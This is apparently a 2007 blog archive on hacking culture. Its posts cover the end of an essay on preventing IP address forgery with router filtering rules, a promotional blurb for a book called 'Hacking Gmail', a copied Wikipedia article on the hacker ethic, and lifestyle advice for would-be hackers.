interface-0 prevent in to 0.0.0.0 # no other inbound traffic

# Rule 5 for a backbone
# prevent packets that should stay in our backbone from going out
interface-0 allow out from UK-1 # UK traffic
interface-0 allow out from UK-2 # UK traffic
...
interface-0 allow out from UK-n # UK traffic
interface-0 prevent out from 0.0.0.0 # no other outbound traffic



In this example, we have assumed that all UK traffic is on IP
addresses identified as UK-1, ..., UKn.

What-ifs and Objections

WHAT IFS?
* What if a private network ignores the rules? It is to be expected
than many private networks will ignore any such rules, either
through ignorance, intent, or inattention. But even if all private
networks ignored all of the rules, the rules for ISPs would
prevent IP forgery from extending to the overall infrastructure.
* What if an ISP ignores the rules? If an ISP ignores the rules and
allows IP forgery, the backbone can protect the rest of the
Internet, at least to the point where forged packets within the
ISP's domain remain within or are traceable to that domain. That
means that the ISP's clients would be subject to IP forgeries from
other clients of that ISP, but that the rest of the Internet would
be able to trace all packets coming from that ISP to that ISP.
* What if the backbone ignores the rules? If all of the backbone
providers ignore the rules, unless everyone else follows them, we
will continue to have IP forgeries through the ISPs that don't
follow the rules.
* What if combinations ignore the rules? Depending on the specific
combinations, we will have more or fewer IP address forgeries. It
turns out that a complete analysis of this issue is not simple
enough to do in the space provided, but a simple conclusion can be
drawn without a full analysis. As more Internet users and
providers prevent IP address forgery, the job of the forger will
become harder and harder. We don't all have to participate in
order to have proper protection, but if we all fail to
participate, the forgeries will continue.

OTHER OBJECTIONS
* Content (common carrier) objections: Many ISPs and backbone
providers don't want or take responsibility for content in the
Internet. Just like a telephone company, they don't want any role
in examining or dictating the content of the messages - they only
want to be a delivery service. It could be argued that examining
the address information in an IP packet and preventing packets
based on those addresses constitutes limitation of content. Of
course the portion of the content involved here must be examined
in order to route the information, and the routing used in the
Internet already provides exclusion of packets based on IP address
ranges. Furthermore, common carriers (in the U.S.) are allowed to
listen to and filter traffic to the extent that this activity is
done solely to assure the proper operation of the network. Thus
this objection would seem to be moot.
* The cost is too high objection: In fact the cost is negligible. If
the rules set forth herein were applied as a normal part of the
installation and maintenance process, it would come to only a few
minutes of effort during each installation. Even applying them to
systems already in place requires only a few minutes of effort,
again an insubstantial amount of effort well within the discretion
of any systems administrator.
* The we don't want restrictions objections: There are a substantial
number of people that want a total lack of restrictions on
information flowing through the Internet. I generally agree with
the principle of free information flow, except in cases where the
freedom of one person infringes on the freedom of others. This
impingement on other peoples' rights applies to certain types of
information, such as routing information, that must be correct in
order for the Internet to work properly. Since the restrictions
described here only assure that the Internet works properly and
don't restrict the content or flow of information, there is no
restriction of the free flow of information here. Only increased
assurance that those who want to use the media for legitimate
purposes will continue to be able to do so.

Summary

This solution we presented:
* 1) is easy to implement,
* 2) makes good sense from a traffic standpoint,
* 3) allows all legitimate activity without any hinderence,
* 4) works even if all parties don't participate,
* 5) costs almost nothing to implement at each site,
* 6) does not require any changes in existing protocols of traffic
patterns,
* 7) makes good sense for the security of each party that
participates, and
* 8) can be done today.

All that remains is for the people in each of these organizations to
implement these protections. Unlike so many of the problems in the
Internet that are hard to solve and will require years of evolution,
this problem can be solved now. We encourage you to implement these
protections at your earliest convenience and to urge other to do so as
well. Together, we can eliminate IP address forgery.

Wednesday, May 2, 2007

Hacking GMail

Hacking GMail

 

Book Description
The first book to unlock the true power behind Gmail, Hacking Gmail will immediately appeal to Google and Gmail fans
This is serious, down-and-dirty, under-the-hood, code-level hacking that will have readers eliminating the default settings, customizing appearance, disabling advertising, and taking control over their Gmail accounts
Covers turning Gmail into an online hard drive for backing up files, using it as a blogging tool, and even creating customized Gmail tools and hacks
Shows readers how to check their Gmail without visiting the site; use Gmail APIs in Perl, Python, PHP, and other languages, or create their own; and maximize Gmail as a host for message boards, photo galleries, even a blog

Download Now
Click Here to download

Wednesday, April 4, 2007

Hacker ethic

Hacker ethic
From Wikipedia, the free encyclopedia
In modern parlance, the hacker ethic (otherwise known as hacktivism) is either:
  • the belief that information-sharing is a powerful positive good, and that it is an ethical duty of hackers to share their expertise by writing free software and facilitating access to information and computing resources wherever possible; and/or
  • the belief that system cracking for fun and exploration is ethically acceptable as long as the hacker commits no theft, vandalism, or breach of confidentiality. Some distinguish hacking (writing good software and sharing it for free), from cracking (breaking the law).

Both of these normative ethical principles are widely, but by no means universally, accepted among hackers. The first, and arguably the second, emerged from the MIT Artificial Intelligence Laboratory during the '60s and '70s.

Most hackers subscribe to the hacker ethic in the first sense, and many act on it by writing free software, giving the user permission to study, modify, and redistribute it. A few, such as the Free Software Foundation, go further and assert that it is immoral to prevent computer users from sharing or altering software, as is typical with proprietary software.

The second sense is more controversial: some people consider the act of cracking afoul of the government itself to be unethical, like breaking and entering into an office. But the belief that 'ethical' cracking excludes destruction at least moderates the behavior of people who see themselves as 'benign' crackers (see also samurai, grey hat). On this view, it may be one of the highest forms of hacker courtesy to (a) break into a system, and then (b) explain to the SysOp, preferably by email from a superuser account, exactly how it was done and how the hole can be plugged; effectively acting as an unpaid (and unsolicited) tiger team.

The most reliable manifestation of either version of the hacker ethic is that almost all hackers are actively willing to share technical tricks, software, and (where possible) computing resources with other hackers. Huge cooperative networks such as Usenet, FidoNet and the Internet itself can function without central control because of this trait; they both rely on and reinforce a sense of community that may be hackerdom's most valuable intangible asset.

History
The term "hacker ethic" was coined by journalist Steven Levy and used for the first time in Hackers: Heroes of the Computer Revolution (1984). Levy's account of the hacker ethic is in large parts based on the values of the "old school" hackers at MIT Artificial Intelligence Laboratory. Among these hackers were Richard M. Stallman, whom Levy at the time called the last true hacker. The similarities between the Hacker Ethic and values existing in open scientific communities is, therefore, no coincidence.

  • In Levy's codification, the principles of the Hacker Ethic were:
  • Access to computers — and anything which might teach you something about the way the world works — should be unlimited and total. Always yield to the Hands-on Imperative!
  • All information should be free.
  • Mistrust authority — promote decentralization.
  • Hackers should be judged by their hacking, not bogus criteria such as degrees, age, race, or position.
  • You can create art and beauty on a computer.
  • Computers can change your life for the better.

Later in 2001, Finnish philosopher Pekka Himanen opposed the Hacker ethic with Protestant work ethic. In Himanen's opinion the hacker ethic is more closely related to the Virtue ethics found in the writings of Plato and of Aristotle.

For Himanen (who wrote "The Hacker Ethic"), Torvalds (prologue), and Castells (epilogue), the hacker ethic centers around passion, hard work, creativity and joy in creating software.

Written on January 8th, 1986 by a hacker with the handle "The Mentor", 'The Hacker Manifesto' illustrates some of the commonly held philosophies of hacker ethic. Hacker ethic itself is typically a discussion arising in reference to the definition of a hacker as an individual capable and willing to infiltrate, exploit, or otherwise bypass security restrictions for some purpose. It is the intentions of the hacker, and their purpose which are deemed either ethical, or unethical based on the so called hacker ethic. Note, hackers themselves tend to have little patience for incompetence, hence, were one to damage a system in an attempt to infiltrate it, even with good intentions, it may be considered somewhat unethical in that an individual without the necessary skill to accomplish the task at hand, would be deemed unfit to take on the responsibility. The Hacker Manifesto was written to give somewhat of an insight into the motivations of a hacker, which is closely related to the so called hacker ethic. Essentially it served as an argument that, though a hacker may break the law, their intentions may still be entirely good natured, purposeful, beneficial, and otherwise ethical.

Sunday, March 4, 2007

Points For Style Hackers

Again, to be a hacker, you have to enter the hacker mindset. There are some things you can do when you're not at a computer that seem to help. They're not substitutes for hacking (nothing is) but many hackers do them, and feel that they connect in some basic way with the essence of hacking.

  • Learn to write your native language well. Though it's a common stereotype that programmers can't write, a surprising number of hackers (including all the most accomplished ones I know of) are very able writers.

  • Read science fiction. Go to science fiction conventions (a good way to meet hackers and proto-hackers).

  • Train in a martial-arts form. The kind of mental discipline required for martial arts seems to be similar in important ways to what hackers do. The most popular forms among hackers are definitely Asian empty-hand arts such as Tae Kwon Do, various forms of Karate, Kung Fu, Aikido, or Ju Jitsu. Western fencing and Asian sword arts also have visible followings. In places where it's legal, pistol shooting has been rising in popularity since the late 1990s. The most hackerly martial arts are those which emphasize mental discipline, relaxed awareness, and control, rather than raw strength, athleticism, or physical toughness.

  • Study an actual meditation discipline. The perennial favorite among hackers is Zen (importantly, it is possible to benefit from Zen without acquiring a religion or discarding one you already have). Other styles may work as well, but be careful to choose one that doesn't require you to believe crazy things.

  • Develop an analytical ear for music. Learn to appreciate peculiar kinds of music. Learn to play some musical instrument well, or how to sing.

  • Develop your appreciation of puns and wordplay.

The more of these things you already do, the more likely it is that you are natural hacker material. Why these things in particular is not completely clear, but they're connected with a mix of left- and right-brain skills that seems to be important; hackers need to be able to both reason logically and step outside the apparent logic of a problem at a moment's notice.

Work as intensely as you play and play as intensely as you work. For true hackers, the boundaries between "play", "work", "science" and "art" all tend to disappear, or to merge into a high-level creative playfulness. Also, don't be content with a narrow range of skills. Though most hackers self-describe as programmers, they are very likely to be more than competent in several related skills — system administration, web design, and PC hardware troubleshooting are common ones. A hacker who's a system administrator, on the other hand, is likely to be quite skilled at script programming and web design. Hackers don't do things by halves; if they invest in a skill at all, they tend to get very good at it.

Finally, a few things not to do.

  • Don't use a silly, grandiose user ID or screen name.

  • Don't get in flame wars on Usenet (or anywhere else).

  • Don't call yourself a ‘cyberpunk’, and don't waste your time on anybody who does.

  • Don't post or email writing that's full of spelling errors and bad grammar.

  • Don't use a silly, grandiose user ID or screen name. Don't get in flame wars on Usenet (or anywhere else).

The only reputation you'll make doing any of these things is as a twit. Hackers have long memories — it could take you years to live your early blunders down enough to be accepted.

The problem with screen names or handles deserves some amplification. Concealing your identity behind a handle is a juvenile and silly behavior characteristic of crackers, warez d00dz, and other lower life forms. Hackers don't do this; they're proud of what they do and want it associated with their real names. So if you have a handle, drop it. In the hacker culture it will only mark you as a loser.